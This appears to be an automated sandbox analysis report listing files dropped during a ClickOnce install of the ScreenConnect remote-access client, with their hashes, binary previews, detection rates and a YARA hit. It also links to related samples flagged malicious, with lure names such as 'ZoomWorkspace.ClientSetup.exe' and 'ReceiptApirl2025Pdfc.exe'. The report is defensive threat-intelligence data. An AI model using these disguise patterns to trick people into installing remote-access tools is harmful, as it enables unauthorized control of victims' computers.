                                                                                                                  SHA-512:B7C236642F7A5288231D098C288FD44DEA579EAC1B05C4CE188E6AE9F93B10E5152A999DF00BCE8315B882C57D89DA6179EB97746B02BE58DDD280501F18B7C0
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.4.9118" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..tion_25b0fbb6ef7eb094_0018.0004_none_392be736a8533570.cdf-ms

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14608
                                                                                                                  Entropy (8bit):5.716451807194775
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:qNfMX9rf6Iy+7j/8s8oCPEUIjxUrN8s8oTN2x2QPIlFDLhEDh7BqWozOY:qNy9rf6GTX9NjxU5X9R/QPIBM7YzD
                                                                                                                  MD5:FE82CCE96FDF923C3B45F5EEE4ECD78B
                                                                                                                  SHA1:5226056DC1E959B92ABDE439F0BBA0D80BDB6F0B
                                                                                                                  SHA-256:2B8AA878B27CEF18E59E56B04F4262081F9CBC656A8451A78C2357F8CEF9DC06
                                                                                                                  SHA-512:DC813D9FBF9352C0839510532414076342802BA091F4C7675168B8B678A2EB6A5197CC9733E78BAC71140D372C315955B78954E27D921356E97F6FC5C2080400
                                                                                                                  Malicious:false
                                                                                                                  Preview:PcmH........p...."..$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$............M.^z..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%-...>...XT.]...."...........l.....-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client...................................@P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.4.4.9118%........................

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..tion_25b0fbb6ef7eb094_0018.0004_none_392be736a8533570.manifest

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):168849
                                                                                                                  Entropy (8bit):5.58055802513129
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:mNYcT51/FXvMVNWfCXq9ymlrpErpErpBm2o9HuzhJOvP:hcfiVI3rpErpErpBmt8vOvP
                                                                                                                  MD5:9AC4954D33E063FDEF5236004D57442E
                                                                                                                  SHA1:41A208DBB7952BBDA3714F369BBC5110FFC911C2
                                                                                                                  SHA-256:CE37639F366DA772331216865047D422F00A6B0BC46BE4FDB7F0E151DF0D0DA9
                                                                                                                  SHA-512:1DDBADE960AA3F2AEF0B939BAFB919D71586500B8EA2BCEE07C8F39EF2390A784C78EC0A4AD3F7C3936D6C22331B77FE2921DE447542502DD559DF2CE8D91B59
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.4.4.9118" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c.cdf-ms

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4428
                                                                                                                  Entropy (8bit):4.020339881858219
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:Lq9hCDESDdgPe6S+9ow87gVW75uvsrO2V42WAvf1fTO5tPDfUT2f:Lq9h5eV+Ww8e45uqOr2WAvFTOHPTHf
                                                                                                                  MD5:21562DE794EB2B18A3DB6E0363CA4C4A
                                                                                                                  SHA1:02E30F1A56585458359523A9FB4FC57D8319197A
                                                                                                                  SHA-256:DB1E5ADC470F8A83C28929DFE8EA696F54E48B9ED1B046824E81397E47A8F021
                                                                                                                  SHA-512:3AF487BA2A5D9199766A6CF75BBA006BF982E66AF8FD2DE6DD558A5FD14AB1E9430911B788D2A66BB07FE1B701364B0A6A4712368AFE762944EC48D3A5AD241D
                                                                                                                  Malicious:false
                                                                                                                  Preview:PcmH..........+...g.,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$............M.^z........6...................z..w.....[~31.X....O.&r..Vz....s".I...R....[s.T..<....y..&..d. ....B(.....!.....E..X.$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(.......................(...........................(...(...8.......`.......h...(...|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c.manifest

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1632
                                                                                                                  Entropy (8bit):5.078428016255135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AK+vSkcyMkcbEMkcuMkcVSkcf5bdTo:3FYZ8h9o9gI0AKCHMkTMk3MkGAXTo
                                                                                                                  MD5:3294B09FFFB0EA1FCBB0B44799C75776
                                                                                                                  SHA1:AFC7CE588221E3FBBDF7B142E8D4C73806E56418
                                                                                                                  SHA-256:F49056A4115510EB50556BA47925E004555385398BE212081986F2B8A9E771AB
                                                                                                                  SHA-512:5E7630B507309223C1BBD217E14C9576081A58DAB1FF09E7C62ABCC064CA7B4FE06EEE81AF60C156D9308E8A21FFA918429D36DC9BE44D91BFFEC99CBCFEC1B1
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.4.9118" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):95512
                                                                                                                  Entropy (8bit):6.50433047723113
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:Ig1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMB7eh:BhbNDxZGXfdHrX7rAc6myJkgoU0HK0
                                                                                                                  MD5:D3E628C507DC331BAB3DE1178088C978
                                                                                                                  SHA1:723D51AF347D333F89A6213714EF6540520A55C9
                                                                                                                  SHA-256:EA1CFAD9596A150BEB04E81F84FA68F1AF8905847503773570C901167BE8BF39
                                                                                                                  SHA-512:4B456466D1B60CDA91A2AAB7CB26BB0A63AAA4879522CB5D00414E54F6D2D8D71668B9E34DFF1575CC5B4C92C61B9989ABBE4B56A3E7869A41EFCC45D23CA966
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: support.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                  • Filename: support.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                  • Filename: ZoomWorkspace.ClientSetup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ZoomWorkspace.ClientSetup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Microsoft-Outlook-DocumentPDF.ClientSetup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ReceiptApirl2025Pdfc.exe, Detection: malicious, Browse
                                                                                                                  • Filename: VCredistx86.msi, Detection: malicious, Browse
                                                                                                                  • Filename: VC_redist.x86.msi, Detection: malicious, Browse
                                                                                                                  • Filename: tool.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................#N....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61208
                                                                                                                  Entropy (8bit):6.323262945280686
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:Eyot+ktY7OUZXPGQWvmDtyQXIE+TCBAIfXWbOx79+6:EyYtxURPG0yQVNNxD
                                                                                                                  MD5:E34E8690E53141EE6914238252FA9988
                                                                                                                  SHA1:B772AEF5386F2D688B249935F13BB430C5088FA9
                                                                                                                  SHA-256:BBE9AE87E2DBA00C5E2F78DC742608862D03F72246669C7FCB01C5646A6DF10B
                                                                                                                  SHA-512:06A64527EB281FE5241A7B43BCCBBA9983F05712ED9719D5720062B88731801EACEC66C0D326E57D93D1E526FB29B432F65D50E500AF7DBF53DC5FDC5145C479
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: support.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                  • Filename: support.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                  • Filename: ZoomWorkspace.ClientSetup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ZoomWorkspace.ClientSetup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Microsoft-Outlook-DocumentPDF.ClientSetup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ReceiptApirl2025Pdfc.exe, Detection: malicious, Browse
                                                                                                                  • Filename: VCredistx86.msi, Detection: malicious, Browse
                                                                                                                  • Filename: VC_redist.x86.msi, Detection: malicious, Browse
                                                                                                                  • Filename: tool.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|............"...0.............^.... ........@.. ....................... ............@.....................................O....... ................)..........P...8............................................ ............... ..H............text...d.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................=.......H........S................................................................(....*^.(.......b...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s"...o(...%~....o)...}......(....o*...o+....(,.....A...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsClient.exe.config

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):81688
                                                                                                                  Entropy (8bit):5.862062649096442
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:htyQl44XzbVI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7co798g:iOZukLdooP
                                                                                                                  MD5:8531526B6F151A08AD8A551611F686D3
                                                                                                                  SHA1:D4A6ABD7256F7624953992ECFE9C6EFBF2529180
                                                                                                                  SHA-256:1BBBE38D4F1193B0AE098BF1BDCE00761EDCD555D0D77F2A33DA6D271FAE4BF0
                                                                                                                  SHA-512:5F5BD79A25ABD20F4E74E128E801C3B852AEDBC4DA0F7A9F8CC72496564010115BC1A098D929597128C757286024B372E2DFFBE5BE6A562F921D70C7F0B81283
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>............."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):549888
                                                                                                                  Entropy (8bit):6.035933098806984
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:JL2DLhOnlTQatfpw7TkJ9/KeZBFR/Zw7VTcWt5jv8jyEzR39GBCquqwMSRq/sreR:JLMhOeM52aBFcTbkdpRL6Ei
                                                                                                                  MD5:665A8C1E8BA78F0953BC87F0521905CC
                                                                                                                  SHA1:FE15E77E0AEF283CED5AFE77B8AECADC27FC86CF
                                                                                                                  SHA-256:8377A87625C04CA5D511CEEC91B8C029F9901079ABF62CF29CF1134C99FA2662
                                                                                                                  SHA-512:0F9257A9C51EB92435ED4D45E2EAAA0E2F12983F6912F6542CC215709AE853364D881F184687610F88332ECA0F47E85FA339ADE6B2D7F0F65ADB5E3236A7B774
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0..\..........Bv... ........... ....................................@..................................u..O.......t...........................Pu..8............................................ ............... ..H............text...PZ... ...\.................. ..`.rsrc...t............^..............@..@.reloc...............b..............@..B................!v......H........C..41...................t........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1726976
                                                                                                                  Entropy (8bit):6.6400445410513145
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:aOgPFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:PgPJkGYYpT0+TFiH7efP
                                                                                                                  MD5:7099C67FE850D902106C03D07BFB773B
                                                                                                                  SHA1:F597D519A59A5FD809E8A1E097FDD6E0077F72DE
                                                                                                                  SHA-256:2659F660691D65628D2FCC3BFC334686CD053F162CDB73BF7A0DA0AC6449DB92
                                                                                                                  SHA-512:17849CB444D3AC2CD4658D4ECA9DC89652BEAE6C6A2BD765749D8BA53E37248FD92A00AF2B45371C21182135FFFA6DD96DC9570BFD41459F23E084C3E122D162
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=..........." ..0..R...........q... ........... ....................................@..................................p..O.......|............................p..8............................................ ............... ..H............text....Q... ...R.................. ..`.rsrc...|............T..............@..@.reloc...............X..............@..B.................p......H.......................d...0....o........................................(+...*^.(+..........%...}....*:.(+.....}....*:.(+.....}....*:.(+.....}....*..s,...*..s-...*:.(......(/...*..{0...*"..}0...*J.(1........(2...&*:.(......(3...*..{4...*"..}4...*.0..(........(5......+.............(2...&..X....i2.*v.(.....s6...}.....s7...}....*v.{.....r...p(...+.....o9....*.0...........o:....+..o;......(...+&.o....-....,..o......*..........."........{..........o<...&.......(.....*....0..L...

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):602392
                                                                                                                  Entropy (8bit):6.179559387432912
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:EyB4P+n4htgqvqURfRa5CgSM4ZrvR/YKcSAwqrKyKij414Sc4q2/R4IEyCui5ASE:/B4KsgqyUuiXrveKtaa3CSaq
                                                                                                                  MD5:AFA993C978BC52D51E8AF08A02892B4E
                                                                                                                  SHA1:6D92666AE52761AD1E6C5FBB8E1355354516BED7
                                                                                                                  SHA-256:08EFE3E41BD508E2E9C3F8CF4D466CB1C96C35C1B463E79F2A24AC031AB79B48
                                                                                                                  SHA-512:D9D17361CB3C24F640086EFD97F42B15B642917898879710D35B58F8F746B51936518FBDE1F1FB45C1D524BCBEBA74B4CBDE7F32308AF8CC7A8149A6EEDE18F2
                                                                                                                  Malicious:false
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`......2.....@.................................Q...O.... ...................)...@..........8............................................ ............... ..H............text...x.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........I..<...................(.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):197120
                                                                                                                  Entropy (8bit):6.586596996537647
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:NxLtNGBlIyS7/OTjusqVFJRJcyzvzqSmzDvJXY3:HtNGBGySaTqPJYEqSmG
                                                                                                                  MD5:FF388E261FCB88BB2FB4295B4E84BE66
                                                                                                                  SHA1:622E9B646881E4606A9A82D06E48329CFEBE83AA
                                                                                                                  SHA-256:8872211A8F4FF520D9D3342ED3841EB6FE42F6D83A0F639F6BAF84795DA99DE2
